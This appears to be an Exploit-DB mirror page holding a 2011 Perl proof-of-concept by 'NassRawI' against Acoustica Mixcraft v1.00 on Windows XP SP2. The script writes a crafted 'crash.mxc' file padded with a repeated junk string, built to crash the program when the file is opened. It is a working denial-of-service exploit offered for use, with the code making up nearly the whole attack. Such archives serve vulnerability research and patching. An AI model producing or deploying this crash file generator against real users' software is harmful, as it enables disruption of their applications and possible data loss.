exploit-db-mirror/exploits/windows/dos/17642.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

19 lines
No EOL
520 B
Text

#!/usr/bin/perl
print q(
########################################################
# home : http://www.D99Y.com
# Date : 9/8/2011
# Author : NassRawI
# Software Link : http://www.acoustica.com/mixcraft/
# Version : v1.00 Build 10
# Tested on : Windows XP SP2
########################################################
);
my $file= "crash.mxc";
my $junk= "\x64\x39\x39\x79\x2e\x63\x6f\x6d" x 1000 ;
open(d99y,">$file");
print d99y $junk ;
close(d99y);
print "\n [ # ] Vulnerable File Created !\n"